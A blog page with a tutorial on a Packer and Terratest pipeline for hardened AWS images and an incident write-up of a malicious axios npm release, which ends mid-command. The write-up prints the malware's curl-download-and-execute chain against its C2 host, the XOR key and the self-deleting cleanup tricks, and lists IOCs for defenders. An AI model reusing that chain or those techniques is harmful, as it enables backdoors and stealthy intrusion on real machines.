rosecurity@cloud

Building an AWS Image Factory with Packer and Terratest

2026-05-20T00:00:00+00:00

Sorry I’ve been quiet lately. My head has been down on my newest adventure. I’m so used to being the sole operator, platform engineer, SRE, or whatever that day brings that it’s odd to take a step back and be tasked with providing enterprise cybersecurity for cloud environments that other teams are operating. I’ve had so many cool new projects that will make for some great technical blogs, so I figured I would start with this one. The idea is simple: how do you provide your organization with hardened operating systems that teams can actually deploy into the cloud? A lot of compliance terms and frameworks get tossed around, but the vision is this: how do you provide an image factory of CIS-hardened AMIs, bake in a custom baseline of tools, and share those images across numerous AWS accounts and organizations?

Here is my approach, the pitfalls, the unknowns, and the fun parts. I apologize in advance that the CI/CD is very GitLab-centric, but if you like the design, feel free to port it over to your source control system of choice.

Scaffolding

The repository starts with the boring stuff first, because the boring stuff is what keeps the project usable after the first week. Besides .gitignore and .gitattributes, there is a short README.md, a Brewfile for local tooling, an .editorconfig, a SECURITY.md, and the usual .gitlab/merge_request_templates and .gitlab/issue_templates so reviews and issues don’t turn into archaeology.

A small Makefile covers common local commands, but .pre-commit-config.yaml does most of the early heavy lifting. It gives the repo one place for file hygiene, formatting checks, and basic guardrails before anything gets near CI. Here’s the first pass of hooks for the Image Factory.

# See https://pre-commit.com for more information
# See https://pre-commit.com/hooks.html for more hooks
repos:
  - repo: https://github.com/pre-commit/pre-commit-hooks
    rev: v5.0.0
    hooks:
      - id: end-of-file-fixer
      - id: check-merge-conflict
      - id: trailing-whitespace
        args: [--markdown-linebreak-ext=md]
      - id: check-shebang-scripts-are-executable

      # YAML
      - id: check-yaml

      # Cross platform
      - id: check-case-conflict
      - id: mixed-line-ending
        args: [--fix=lf]

  - repo: local
    hooks:
      - id: packer-fmt
        name: Packer format check
        entry: packer fmt -check -recursive packer
        language: system
        files: ^packer/.*\.pkr\.hcl$
        pass_filenames: false

      - id: shellcheck
        name: ShellCheck
        entry: shellcheck
        language: system
        types: [shell]

That runs on every commit and removes a lot of pointless review noise. If Packer formatting or shell linting is broken, I want the hook to catch it before a reviewer has to.

Side note, I typically have a dedicated pre-commit CI job for making sure everything passes as a prerequisite to other pipelines.

The repo also has a docs directory for the usual odds and ends: architecture notes, decision records, and diagrams.

AWS Prerequisites

Before the repo can build anything useful, AWS needs a few pieces in place. If the AMIs use encrypted EBS volumes, the KMS key policy has to let the build account use the key and let consumer accounts launch from the shared AMIs. You also need the normal network plumbing: VPC, subnets, routing, security groups, and outbound access so temporary build and test instances can pull updates, download packages, reach SSM, and install whatever baseline tooling your organization requires.

An optional AMI reaper Lambda is worth adding early. Failed builds, superseded images, and half-finished experiments shouldn’t live forever. If the pipeline tags images during build, test, and publish, cleanup can be driven from those tags instead of guessing (thank you boto3).
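To make the tag-driven cleanup idea a little more concrete, here is a minimal shell sketch of the selection step only. It isn’t the Lambda itself (that one is boto3), and stale_amis is a hypothetical helper name. The tag names are the ones the pipeline applies later in this post, and the cutoff date in the comment is a placeholder.

```shell
# Sketch only: pick reaper candidates from "ImageId<TAB>CreationDate" lines.
# stale_amis is a hypothetical helper name, not part of the repo.

# Print the IDs of images created before the cutoff.
# EC2 reports CreationDate as ISO 8601 UTC (e.g. 2026-05-01T12:00:00.000Z),
# so comparing the values as strings orders them by time.
stale_amis() {
  local cutoff="$1"
  awk -F '\t' -v cutoff="$cutoff" '($2 "") < (cutoff "") { print $1 }'
}

# Example wiring (needs AWS credentials, so it is left commented out):
# aws ec2 describe-images --owners self \
#   --filters "Name=tag:ImageFactoryManaged,Values=true" \
#             "Name=tag:ImageFactoryPublished,Values=false" \
#   --query 'Images[].[ImageId,CreationDate]' --output text |
#   stale_amis "2026-05-01T00:00:00.000Z"
```

Filtering on the unpublished tag first means a released image never becomes a candidate, no matter how old it is.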

The last prerequisite is identity. Packer, Terratest, and publishing should each have an IAM role, and CI should use OIDC to assume those roles. Long-lived AWS keys in CI variables are one of those things that feel convenient right up until they become an incident, and they make me feel like I need a shower if I have to use them.

Codebase Structure

The layout is intentionally boring. Each image gets its own Packer root under packer/images/ (for example, packer/images/aws/al2023/), and each root owns the same four files: versions.pkr.hcl, variables.pkr.hcl, sources.pkr.hcl, and build.pkr.hcl. When someone adds another operating system, the plugin versions, inputs, AMI lookup logic, and hardening steps all have a known place to live.

├── account-map.yaml
├── Brewfile
├── docs
├── Makefile
├── packer
│   ├── images
│   │   └── aws
│   │       ├── al2023
│   │       │   ├── build.pkr.hcl
│   │       │   ├── sources.pkr.hcl
│   │       │   ├── variables.pkr.hcl
│   │       │   └── versions.pkr.hcl
│   │       └── ubuntu24.04
│   │           ├── build.pkr.hcl
│   │           ├── sources.pkr.hcl
│   │           ├── variables.pkr.hcl
│   │           └── versions.pkr.hcl
├── README.md
├── scripts
│   ├── build.sh
│   └── gitlab
│       └── detect-packer-changes.sh
├── SECURITY.md
└── tests
    ├── terraform
    │   ├── main.tf
    │   ├── outputs.tf
    │   ├── providers.tf
    │   ├── README.md
    │   ├── variables.tf
    │   └── versions.tf
    └── terratest
        ├── build_test.go
        ├── checks
        │   ├── al2023-cis-level1.yaml
        │   └── ubuntu24.04-cis-level1.yaml
        ├── go.mod
        └── go.sum

The other important root-level file is account-map.yaml. It lists the consumer AWS accounts that should receive launch permissions after an AMI passes testing. I prefer keeping that as data in the repo instead of hiding it in CI variables. A merge request should show exactly who is being added or removed from the distribution list.

Building the Image

The build wrapper stays small. It takes a Packer image root through PKR_ENV, initializes it, checks formatting, validates the template, and runs the build. The manifest post-processor writes its output into artifacts/. The local command and the CI command are the same thing, which makes build failures much easier to reproduce.

#!/usr/bin/env bash

set -euo pipefail

: "${PKR_ENV:? PKR_ENV is required}"
if ! command -v "packer" &>/dev/null; then
  echo "Error: Packer is not installed." >&2
  exit 1
fi

echo "Initializing Packer environment in $PKR_ENV"
packer init "$PKR_ENV"

echo "Checking Packer configuration formatting..."
packer fmt -check "$PKR_ENV"

echo "Validating Packer configurations..."
packer validate "$PKR_ENV"

echo "Building Packer image..."
mkdir -p artifacts
packer build -on-error=cleanup "$PKR_ENV"

For AL2023, the Packer source starts by finding the base AMI, creating a timestamped name, and tagging the AMI and snapshots with enough metadata to make cleanup and audit work sane. Tags like ImageFactoryManaged, ImageFactoryPublished, BaseImageProduct, and SourceAmi give you a quick answer to what created the image, what it was based on, and whether it has been released.

locals {
  build_timestamp = regex_replace(timestamp(), "[- TZ:]", "")
  cis_product     = "CIS Hardened Image Level 1 on Amazon Linux 2023"

  ami_name = var.ami_name != "" ? var.ami_name : format(
    "%s-%s-%s",
    var.ami_name_prefix,
    var.cis_marketplace_version,
    local.build_timestamp,
  )

  common_tags = merge(
    {
      Name                  = local.ami_name
      BaseImageProduct      = local.cis_product
      BaseImageVersion      = var.cis_marketplace_version
      CisBenchmarkLevel     = "1"
      ImageFactoryManaged   = "true"
      ImageFactoryPublished = "false"
      SourceAmi             = data.amazon-ami.this.id
    },
    var.tags,
  )
}

data "amazon-ami" "this" {
  region      = var.aws_region
  owners      = var.source_ami_owners
  most_recent = var.source_ami_most_recent

  filters = merge(
    {
      architecture        = var.source_ami_architecture
      name                = var.source_ami_name_filter
      root-device-type    = "ebs"
      virtualization-type = "hvm"
    },
    var.source_ami_product_code != "" ? { product-code = var.source_ami_product_code } : {},
  )
}

The amazon-ebs source connects over SSH tunneled through SSM Session Manager (communicator = "ssh" with ssh_interface = "session_manager"). It sounds like a small choice, but it changes the operating model quite a bit. I don’t need to punch SSH ingress into a build subnet, manage long-lived key pairs, or explain why a temporary builder was reachable from the internet. The instance gets temporary SSM permissions, Packer connects through Session Manager, and the build network can stay private.

source "amazon-ebs" "al2023" {
  ami_description             = var.ami_description
  ami_name                    = local.ami_name
  ami_regions                 = var.ami_regions
  associate_public_ip_address = var.associate_public_ip_address
  encrypt_boot                = var.encrypt_boot
  instance_type               = var.instance_type
  kms_key_id                  = var.kms_key_id
  region                      = var.aws_region
  source_ami                  = data.amazon-ami.this.id

  communicator     = "ssh"
  pause_before_ssm = "30s"
  ssh_interface    = "session_manager"
  ssh_timeout      = var.ssh_timeout
  ssh_username     = var.ssh_username

  launch_block_device_mappings {
    delete_on_termination = true
    device_name           = "/dev/xvda"
    encrypted             = var.encrypt_boot
    kms_key_id            = var.kms_key_id
    volume_size           = var.root_volume_size
    volume_type           = var.root_volume_type
  }

  run_tags      = merge(local.common_tags, { ImageFactoryStage = "build" })
  snapshot_tags = local.common_tags
  tags          = local.common_tags
}

The hardening layer uses shell in this version because the first pass needed to stay readable and close to the AMI lifecycle. This is just an example baseline. In practice, you could start from an AWS Marketplace image that already comes hardened and layer your custom tooling on top. You could also move the hardening logic into Ansible if that fits your team better. The shape is the same either way: install the baseline agent, apply the deltas, enable the services, clean the machine, and seal it.

build {
  sources = ["source.amazon-ebs.al2023"]

  provisioner "shell" {
    inline_shebang = "/bin/bash -e"

    environment_vars = [
      "UPDATE_PACKAGES=${var.update_packages}",
    ]

    inline = [
      "set -euo pipefail",
      "if [ \"$UPDATE_PACKAGES\" = \"true\" ]; then sudo dnf update -y; fi",
      "if ! rpm -q amazon-ssm-agent >/dev/null 2>&1; then sudo dnf install -y amazon-ssm-agent; fi",
      "if ! rpm -q rsyslog >/dev/null 2>&1; then sudo dnf install -y rsyslog; fi",
      "printf '%s\\n' 'install cramfs /bin/false' 'blacklist cramfs' | sudo tee /etc/modprobe.d/cramfs.conf >/dev/null",
      "printf '%s\\n' 'net.ipv4.conf.all.accept_redirects = 0' 'net.ipv4.conf.default.accept_redirects = 0' | sudo tee /etc/sysctl.d/99-imagefactory-hardening.conf >/dev/null",
      "sudo sysctl -p /etc/sysctl.d/99-imagefactory-hardening.conf",
      "sudo mkdir -p /etc/ssh/sshd_config.d",
      "printf '%s\\n' 'PermitRootLogin no' 'PermitEmptyPasswords no' | sudo tee /etc/ssh/sshd_config.d/10-imagefactory-hardening.conf >/dev/null",
      "sudo chmod 600 /etc/ssh/sshd_config.d/10-imagefactory-hardening.conf",
      "printf '%s\\n' 'umask 027' | sudo tee /etc/profile.d/99-imagefactory-umask.sh >/dev/null",
      "sudo chmod 644 /etc/profile.d/99-imagefactory-umask.sh",
      "sudo systemctl enable --now amazon-ssm-agent",
      "sudo systemctl enable --now rsyslog",
      "sudo dnf clean all",
      "sudo cloud-init clean --logs",
      "sudo rm -f /etc/ssh/ssh_host_*",
    ]
  }

  post-processor "manifest" {
    output     = "artifacts/${var.ami_name_prefix}-manifest.json"
    strip_path = true
  }
}

The Ubuntu image follows the same pattern with apt, snap, a different username, and a different root device. AL2023 and Ubuntu aren’t identical, but the repo shape is close enough that a reviewer can find the operating-system-specific differences quickly.

Build Pipelines

The parent pipeline has three stages: detect, dispatch, and secret detection. The detect job figures out which image roots changed, writes a small matrix artifact, and generates a child pipeline. The dispatch job starts that generated child pipeline. This keeps the parent pipeline fast without using a giant static matrix that rebuilds every image because one line changed in one Packer directory.

stages:
  - detect
  - dispatch
  - secret-detection

variables:
  SECRET_DETECTION_ENABLED: "true"
  PACKER_VERSION: "1.15.1"
  PACKER_BUILD_IMAGE: "amazonlinux:2023"
  AWS_REGION: "us-east-2"

include:
  - local: .gitlab/ci/detect/*.gitlab-ci.yml
  - local: .gitlab/ci/dispatch/*.gitlab-ci.yml
  - template: Security/Secret-Detection.gitlab-ci.yml

The change detector compares the base and head SHAs, walks changed files under packer/images/**, finds the nearest directory containing versions.pkr.hcl, and emits a child pipeline job for each changed image. The generated job forwards variables like PKR_ENV, PKR_IMAGE, and PKR_CHECKS_FILE, so one provider pipeline can handle many image directories without copy and paste.

find_packer_root() {
  path="$1"
  dir="${path%/*}"

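  while [ "$dir" != "." ] && [ "$dir" != "packer/images" ]; do
    if [ -f "$dir/versions.pkr.hcl" ]; then
      printf '%s\n' "$dir"
      return 0
    fi
    # Stop when there is no parent left to strip; otherwise a path
    # outside packer/images would loop forever.
    parent="${dir%/*}"
    if [ "$parent" = "$dir" ]; then break; fi
    dir="$parent"
  done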

  return 1
}

checks_file() {
  case "$1" in
    al2023)
      printf 'checks/al2023-cis-level1.yaml'
      ;;
    ubuntu24.04)
      printf 'checks/ubuntu24.04-cis-level1.yaml'
      ;;
    *)
      printf 'checks/al2023-cis-level1.yaml'
      ;;
  esac
}
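For a feel of how those pieces fit together, here is a minimal sketch of turning a list of changed paths into a unique set of image roots. changed_roots is a hypothetical helper name, and BASE_SHA and HEAD_SHA in the comment are assumed variables, not necessarily what the real script uses. The lookup function is a copy of the logic above so the block runs on its own.

```shell
# Sketch only: read changed paths (one per line) on stdin and print the
# unique Packer roots they belong to.

# Copy of the lookup logic from the detector script.
find_packer_root() {
  path="$1"
  dir="${path%/*}"
  while [ "$dir" != "." ] && [ "$dir" != "packer/images" ]; do
    if [ -f "$dir/versions.pkr.hcl" ]; then
      printf '%s\n' "$dir"
      return 0
    fi
    dir="${dir%/*}"
  done
  return 1
}

# changed_roots is a hypothetical helper name.
changed_roots() {
  while IFS= read -r path; do
    case "$path" in
      # Only paths under packer/images/ can map to an image root.
      packer/images/*) find_packer_root "$path" || true ;;
    esac
  done | sort -u
}

# Example wiring in CI (BASE_SHA and HEAD_SHA are assumed variables):
# git diff --name-only "$BASE_SHA" "$HEAD_SHA" | changed_roots
```

Several changed files in one image directory collapse to a single root, so each image gets at most one child job.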

The AWS child pipeline is where the real lifecycle happens. It builds the AMI, extracts the Packer manifest, launches a test instance, runs hardening checks over SSM, and publishes only after those checks pass.

stages:
  - build
  - test
  - publish

packer:build:
  extends: .packer
  stage: build
  script:
    - ./scripts/build.sh
    - |
      manifest="$(find artifacts -type f -name '*-manifest.json' | sort | tail -n 1)"
      artifact_ids="$(jq -r '[.builds[] | select(.artifact_id != null and .artifact_id != "") | .artifact_id] | last // ""' "$manifest")"
      primary_artifact="${artifact_ids%%,*}"
      ami_region="${primary_artifact%%:*}"
      ami_id="${primary_artifact#*:}"
      ami_name="$(aws ec2 describe-images --region "$ami_region" --image-ids "$ami_id" --query 'Images[0].Name' --output text)"

      {
        printf 'AMI_ARTIFACT_IDS=%s\n' "$artifact_ids"
        printf 'AMI_REGION=%s\n' "$ami_region"
        printf 'AMI_ID=%s\n' "$ami_id"
        printf 'AMI_NAME=%s\n' "$ami_name"
      } > artifacts/packer.env
  artifacts:
    reports:
      dotenv: artifacts/packer.env
    paths:
      - artifacts/

terratest:ami:
  extends: .terratest
  stage: test
  needs:
    - job: packer:build
      artifacts: true
  script:
    - cd tests/terratest
    - go test -v -timeout 45m . -args -ami_name "$AMI_NAME" -checks_file "${PKR_CHECKS_FILE:-checks/al2023-cis-level1.yaml}"

The artifacts/packer.env file is the handoff between build and test. GitLab loads it as a dotenv report, so the test stage doesn’t have to parse the Packer manifest again. It gets the AMI name from the previous job and uses that as the input for the Terratest fixture.
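The parameter expansions in the build job are unpicking Packer’s artifact_id string, which packs every region into one comma-separated value. Here is a small sketch of that split on its own. split_artifacts is a hypothetical helper name and the AMI IDs in the comment are made up.

```shell
# Sketch only: split a Packer artifact_id such as
# "us-east-2:ami-0aaa,us-west-2:ami-0bbb" into "region ami" lines.
# split_artifacts is a hypothetical helper; the AMI IDs are placeholders.
split_artifacts() {
  local artifact
  local IFS=','
  for artifact in $1; do
    # Everything before the first colon is the region, the rest is the AMI ID.
    printf '%s %s\n' "${artifact%%:*}" "${artifact#*:}"
  done
}

# Example: split_artifacts "$AMI_ARTIFACT_IDS"
```

The build job only needs the first pair for the test instance, while the publish job walks all of them.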

The other part I care about is authentication. The build and test jobs use GitLab OIDC to assume an AWS role. No long-lived AWS access keys in CI, no local credentials pasted into variables, and no mystery user showing up in CloudTrail. The job writes the GitLab OIDC token to a file, exports AWS_ROLE_ARN, and lets the AWS SDK credential chain handle the rest.

.packer:
  image:
    name: "$PACKER_BUILD_IMAGE"
    entrypoint: [""]
  id_tokens:
    AWS_OIDC_TOKEN:
      aud: "https://gitlab.com"
  variables:
    AWS_WEB_IDENTITY_TOKEN_FILE: "$CI_PROJECT_DIR/.aws/gitlab-oidc-token"
  before_script:
    - |
      : "${AWS_OIDC_TOKEN:?Missing GitLab AWS OIDC token.}"
      : "${AWS_PACKER_BUILD_OIDC_ROLE_ARN:?Missing AWS Packer build OIDC role ARN.}"

      mkdir -p "$CI_PROJECT_DIR/.aws"
      printf '%s' "$AWS_OIDC_TOKEN" > "$AWS_WEB_IDENTITY_TOKEN_FILE"
      export AWS_ROLE_ARN="$AWS_PACKER_BUILD_OIDC_ROLE_ARN"
      export AWS_ROLE_SESSION_NAME="gitlab-$CI_PROJECT_ID-$CI_PIPELINE_ID-$CI_JOB_ID"

Testing and Scanning AMIs

Building an AMI is not enough. The pipeline needs to boot the image and prove that the expected hardening controls are present on a running instance.

The test fixture launches one EC2 instance from the AMI name produced by Packer. It discovers the build VPC and subnets by tag, attaches a temporary SSM-capable instance profile when one is not provided, and avoids SSH entirely.

data "aws_ami" "test" {
  count = var.tests_enabled ? 1 : 0

  most_recent = true
  owners      = var.ami_owners

  filter {
    name   = "name"
    values = [var.ami_name]
  }

  filter {
    name   = "root-device-type"
    values = ["ebs"]
  }

  filter {
    name   = "virtualization-type"
    values = ["hvm"]
  }
}

resource "aws_instance" "test" {
  count = var.tests_enabled ? 1 : 0

  ami                         = one(data.aws_ami.test[*].id)
  instance_type               = var.instance_type
  subnet_id                   = sort(one(data.aws_subnets.test[*].ids))[0]
  vpc_security_group_ids      = var.security_group_ids != null ? var.security_group_ids : [one(aws_security_group.test[*].id)]
  iam_instance_profile        = var.iam_instance_profile != null ? var.iam_instance_profile : one(aws_iam_instance_profile.test[*].name)
  associate_public_ip_address = var.associate_public_ip_address

  tags = merge(
    var.tags,
    {
      Name = format("%s-test", var.ami_name)
    },
  )
}

The Go test loads a YAML file of hardening checks, waits for SSM to report that the instance is connected, and then runs each command through AWS-RunShellScript. A check passes when the command exits successfully and, when needed, stdout contains the expected value.

type hardeningCheck struct {
	ID                   string `yaml:"id"`
	Description          string `yaml:"description"`
	Command              string `yaml:"command"`
	ExpectStdoutContains string `yaml:"expect_stdout_contains,omitempty"`
}

func TestAMIHardeningChecks(t *testing.T) {
	t.Parallel()
	logger.Default = logger.Discard

	if *amiName == "" {
		t.Skip("ami_name flag must be set")
	}

	const tfDir = "../terraform"

	defer ts.RunTestStage(t, "destroy", func() {
		destroyTerraform(t, tfDir)
	})

	ts.RunTestStage(t, "deploy", func() {
		applyTerraform(t, tfDir)
	})

	ssmClient := aws.NewSsmClient(t, awsRegion)

	ts.RunTestStage(t, "validate", func() {
		validate(t, tfDir, ssmClient)
	})
}

The checks use plain YAML so security engineers can review them without having to read Go. Adding another assertion means updating the relevant checks file and letting the same test harness run it.

checks:
  - id: 1.1.1.1-cramfs-disabled
    description: cramfs filesystem module is disabled
    command: "! lsmod | grep -q cramfs && modprobe -n -v cramfs 2>&1 | grep -qE 'install /bin/(true|false)'"

  - id: 1.5.1-aslr-enabled
    description: kernel.randomize_va_space is set to 2 (full ASLR)
    command: "sysctl -n kernel.randomize_va_space"
    expect_stdout_contains: "2"

  - id: 5.2.6-ssh-root-login-disabled
    description: SSH PermitRootLogin is set to no
    command: "sshd -T 2>/dev/null | grep -i '^permitrootlogin' | awk '{print $2}'"
    expect_stdout_contains: "no"
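When I’m drafting a new check, it helps to try the pass rule by hand before it goes anywhere near the Go harness. This is a rough local stand-in for that rule, not the harness itself, and run_check is a hypothetical helper name.

```shell
# Sketch only: the pass rule described above, reproduced locally.
# run_check is a hypothetical helper, not part of the repo.
run_check() {
  local cmd="$1" expected="${2:-}" output
  # A non-zero exit status fails the check outright.
  output="$(bash -c "$cmd" 2>/dev/null)" || return 1
  # When an expected value is given, stdout must contain it.
  if [ -n "$expected" ]; then
    case "$output" in
      *"$expected"*) return 0 ;;
      *) return 1 ;;
    esac
  fi
  return 0
}

# Example: run_check "sysctl -n kernel.randomize_va_space" "2" && echo pass
```

Keep in mind that a substring match is loose: an expected value of "2" would also accept an output of "12", so pick expected strings that can’t be matched by accident.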

The custom check format isn’t mandatory. If a team doesn’t want to maintain a separate validation harness, the same checks can move into Ansible validation playbooks. Ansible can use SSM to run checks on the temporary instance without opening SSH, which keeps the network model mostly the same while moving the assertions into a tool more operators already know. That is probably where this project goes over time.

This isn’t a full substitute for every scanner or every benchmark. The wider program should still include vulnerability scanning, package inventory, and Amazon Inspector coverage. These tests catch direct build regressions immediately: the service didn’t start, the kernel setting didn’t stick, the SSH drop-in didn’t get read, or the baseline package never landed.

Publishing is gated to the default branch. Merge requests can build and test, but they don’t share AMIs to the organization. Once a default-branch build passes, the publish job tags the image as published and grants launch permissions to each account in account-map.yaml.

publish:ami:
  extends: .terratest
  stage: publish
  needs:
    - job: packer:build
      artifacts: true
    - job: terratest:ami
  script:
    - |
      published_at="$(date -u +%Y-%m-%dT%H:%M:%SZ)"
      account_ids="$(sed -n "s/.*: '\([0-9]\{12\}\)'$/\1/p" account-map.yaml)"

      if [ -z "$account_ids" ]; then
        printf 'No AWS account IDs found in account-map.yaml.\n' >&2
        exit 1
      fi

      for artifact in $(printf '%s' "$AMI_ARTIFACT_IDS" | tr ',' ' '); do
        ami_region="${artifact%%:*}"
        ami_id="${artifact#*:}"

        aws ec2 create-tags \
          --region "$ami_region" \
          --resources "$ami_id" \
          --tags \
            Key=ImageFactoryPublished,Value=true \
            Key=ImageFactoryPublishedAt,Value="$published_at"

        for account_id in $account_ids; do
          aws ec2 modify-image-attribute \
            --region "$ami_region" \
            --image-id "$ami_id" \
            --launch-permission "Add=[{UserId=$account_id}]"
        done
      done
  rules:
    - if: '$CI_COMMIT_REF_NAME == $CI_DEFAULT_BRANCH'

The operational details matter here. The job reads artifact IDs from the Packer manifest instead of assuming one region. It tags the AMI after tests pass, not before. It fails closed if the account map is empty. Those small choices make the release process repeatable without someone babysitting every run.
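For reference, here is a minimal sketch of the account-map parsing in isolation. The file layout in the comment is an assumption inferred from the sed pattern in the publish job (a name, a colon, then a single-quoted 12-digit ID). The account names and IDs are placeholders, and account_ids_from_map is a hypothetical helper name.

```shell
# Sketch only. Assumed account-map.yaml layout (placeholder values):
#
#   accounts:
#     sandbox: '111122223333'
#     prod: '444455556666'
#
# account_ids_from_map is a hypothetical helper name.
account_ids_from_map() {
  # Print only the 12-digit IDs from lines that end in a quoted account ID.
  sed -n "s/.*: '\([0-9]\{12\}\)'$/\1/p" "$1"
}

# Example: account_ids_from_map account-map.yaml
```

One thing to watch: an entry that is unquoted or has trailing whitespace is skipped silently, so the empty-list check only trips when nothing in the file matches at all.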

Tradeoffs and Unknowns

The main tradeoff is time. Building an AMI, booting it, waiting for SSM, running checks, and cleaning everything up is slower than normal application CI. The change-detection pipeline keeps the cost down by rebuilding only affected images. The boot test is still worth it when the alternative is distributing a broken base image to dozens of accounts.

Benchmark drift needs active ownership. CIS guidance, Marketplace images, distro defaults, and security agents all change. The validation checks should live beside the image definition so every hardening change can be reviewed with the matching test change.

Marketplace image handling has its own operational messiness. Product codes, owner IDs, naming patterns, and regional availability are all things you have to test in a real AWS account. Parameterizing the inputs helps, but it doesn’t remove the fact that AWS Marketplace images aren’t always as smooth as a vanilla owner-and-name AMI lookup.

Finally, AMI sharing is only part of distribution. Consumers still need a sane way to discover the latest approved AMI, whether that is through tags, SSM parameters, Service Catalog, Terraform data sources, or an internal platform workflow. Sharing the image makes it available. It doesn’t automatically make every team use it correctly.

Wrapping Up

An image factory isn’t a compliance shortcut. It is a controlled path for choosing a trusted base, applying organization-specific deltas, testing the running result, and sharing the AMI only after the pipeline proves it is ready.

That’s the real goal: turn “please use the hardened image” from a slide deck request into something teams can actually use.

If you liked (or hated) this blog, feel free to check out my GitHub!

Welcome to Transitive Dependency Hell

2026-03-31T00:00:00+00:00

At 00:21 UTC on March 31, someone published axios@1.14.1 to npm. Three hours later it was pulled. In between, every npm install and npx invocation that resolved axios@latest executed a backdoor on the installing machine. Axios has roughly 80 million weekly downloads, and here’s what that three-hour window looked like from one developer’s MacBook.

Monday Night

A developer sits down, opens a terminal, and runs a command they’ve run dozens of times before:

npx --yes @datadog/datadog-ci --help

A legitimate tool from a legitimate vendor. The --yes flag skips npm’s confirmation prompt. The developer (or Claude) isn’t even using the tool yet, just checking its options.

npm resolves the dependency tree and starts writing packages to disk: dogapi, escodegen, esprima, js-yaml, fast-xml-parser, rc, is-docker, semver, uuid, and axios. All names you’d recognize, and all packages that individually look fine. But axios just resolved to 1.14.1, which is not the version that Axios’s maintainers published four days earlier. It’s the version an attacker published twenty minutes ago.

The Hijack

axios@1.14.0 was the last legitimate release, published on March 27 through GitHub Actions OIDC provenance. The attacker compromised the npm account of jasonsaayman, an existing Axios maintainer, and changed the account email from jasonsaayman@gmail.com to ifstap@proton.me. With publish access, they pushed two malicious versions in quick succession:

00:21:58 UTC: axios@1.14.1, tagged latest
01:00:57 UTC: axios@0.30.4, tagged legacy

The latest tag meant every unversioned axios install worldwide pulled the backdoor. The legacy tag caught anyone pinned to the 0.x line. Both versions added a single new dependency: plain-crypto-js.

The Postinstall Chain

plain-crypto-js declared postinstall: node setup.js in its package.json, and npm ran it automatically. The script used two layers of obfuscation (string reversal with base64 decoding, then an XOR cipher keyed with OrDeR_7077) to hide its real behavior from anyone grepping for suspicious strings. Once decoded, it branched by platform.

On the developer’s Mac, CrowdStrike’s process tree captured the full chain. npx spawned node setup.js, which shelled out to /bin/sh to launch osascript against a script dropped into the per-user temp directory:

nohup osascript /var/folders/gz/s87fs56d0pqbr1s7l1b898h80000gn/T/6202033

osascript is Apple’s AppleScript interpreter, a legitimate Apple-signed binary present on every Mac. Running code through it instead of directly lets the attacker hide behind a trusted process name. The nohup ensures the process survives if the parent terminal closes, and the AppleScript then executed the real payload:

sh -c 'curl -o /Library/Caches/com.apple.act.mond \
            -d packages.npm.org/product0 \
            -s http://sfrclak.com:8000/6202033 \
       && chmod 770 /Library/Caches/com.apple.act.mond \
       && /bin/zsh -c "/Library/Caches/com.apple.act.mond http://sfrclak.com:8000/6202033 &"' \
  &> /dev/null

Download, set executable, and launch the beacon, all in a single sh -c invocation. If any step fails, the chain stops. If it succeeds, the malware is already running before the AppleScript exits.

The output path masquerades as an Apple system daemon using the com.apple.* reverse-DNS convention. The -d packages.npm.org/product0 is not a real npm URL but a tracking identifier sent as POST data so the C2 knows which package triggered the install. The -s flag keeps curl silent, and the outer &> /dev/null swallows any output from the entire chain.

The binary immediately began beaconing to 142.11.206.73:8000 (sfrclak.com) over HTTP. Ten hours later, CrowdStrike’s telemetry shows com.apple.act.mond still running and reading /Library/Preferences/com.apple.networkd.plist for network interface configurations, proxy settings, and VPN connection details. The kind of reconnaissance you do when you’re deciding whether a machine is worth keeping access to.

Meanwhile, back in node_modules, setup.js was cleaning up after itself. It deleted its own file with fs.unlink(__filename) and renamed a clean package.md to package.json, overwriting the version that declared the postinstall hook. Anyone investigating the installed package later would find no trace of the trigger.

Not Just Macs

The same setup.js had branches for every major platform:

Platform	Payload Path	Technique
macOS	`/Library/Caches/com.apple.act.mond`	AppleScript, curl, binary masquerading as Apple daemon
Windows	`%PROGRAMDATA%\wt.exe`	PowerShell copied and renamed to look like Windows Terminal; VBScript loader drops `.ps1` payload with `-w hidden -ep bypass`
Linux	`/tmp/ld.py`	Python script downloaded and backgrounded with `nohup python3`

All three phoned home to the same C2: sfrclak.com:8000/6202033.

What CrowdStrike Caught (and Didn’t)

Falcon flagged the macOS beacon as MacOSApplicationLayerProtocol, mapping to T1071 (Application Layer Protocol) under TA0011 (Command and Control). The detection triggered on the last step in the chain: a binary at a suspicious path making outbound HTTP requests on a non-standard port.

Everything before that ran unimpeded. The node setup.js postinstall hook, the osascript execution from a temp directory, the curl download and chmod all completed before any security tooling intervened. If the attacker had used HTTPS on port 443 to a less suspicious-looking domain, the beacon might not have triggered either.

IOCs

Indicator	Type	Value
C2 Domain	Domain	`sfrclak.com`
C2 IP	IPv4	`142.11.206.73`
C2 Port	Port	`8000`
Campaign ID	String	`6202033`
macOS Payload	File	`/Library/Caches/com.apple.act.mond`
macOS Hash	SHA256	`92ff08773995ebc8d55ec4b8e1a225d0d1e51efa4ef88b8849d0071230c9645a`
Windows Payload	File	`%PROGRAMDATA%\wt.exe`
Linux Payload	File	`/tmp/ld.py`
Tracking ID	String	`packages.npm.org/product0`
Compromised Packages	npm	`axios@1.14.1`, `axios@0.30.4`, `plain-crypto-js@4.2.0-4.2.1`
Hijacked Account	npm	`jasonsaayman` (email changed to `ifstap@proton.me`)
XOR Key	String	`OrDeR_7077`
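If you want a quick first look at a Mac or Linux machine, here is a minimal sketch that checks for the payload paths from the table. find_payloads is a hypothetical helper name. A clean result is only a hint, since the malware could have moved or removed its files.

```shell
# Sketch only: report which of the given paths exist on this machine.
# find_payloads is a hypothetical helper name.
find_payloads() {
  local path
  for path in "$@"; do
    if [ -e "$path" ]; then
      printf 'FOUND %s\n' "$path"
    fi
  done
}

# Example, using the macOS and Linux payload paths from the IOC table:
# find_payloads /Library/Caches/com.apple.act.mond /tmp/ld.py
```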

Takeaways

Check your lockfiles now. Search package-lock.json, yarn.lock, and pnpm-lock.yaml for axios@1.14.1, axios@0.30.4, or any reference to plain-crypto-js. If you find them, assume the installing machine is compromised.
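Here is a rough sketch of that search, assuming the usual lockfile shapes: tarball URLs in package-lock.json and yarn.lock, and name@version keys in pnpm-lock.yaml. Lockfile formats vary by package manager version, so the patterns are a best guess, and scan_lockfiles is a hypothetical helper name.

```shell
# Sketch only: list lockfiles that mention the compromised releases.
# scan_lockfiles is a hypothetical helper; treat a clean result as a hint,
# not proof, because lockfile formats differ between tool versions.
scan_lockfiles() {
  local root="${1:-.}"
  # grep exits non-zero when nothing matches; the printed paths are the signal.
  find "$root" \
    \( -name package-lock.json -o -name yarn.lock -o -name pnpm-lock.yaml \) \
    -type f -exec grep -lE \
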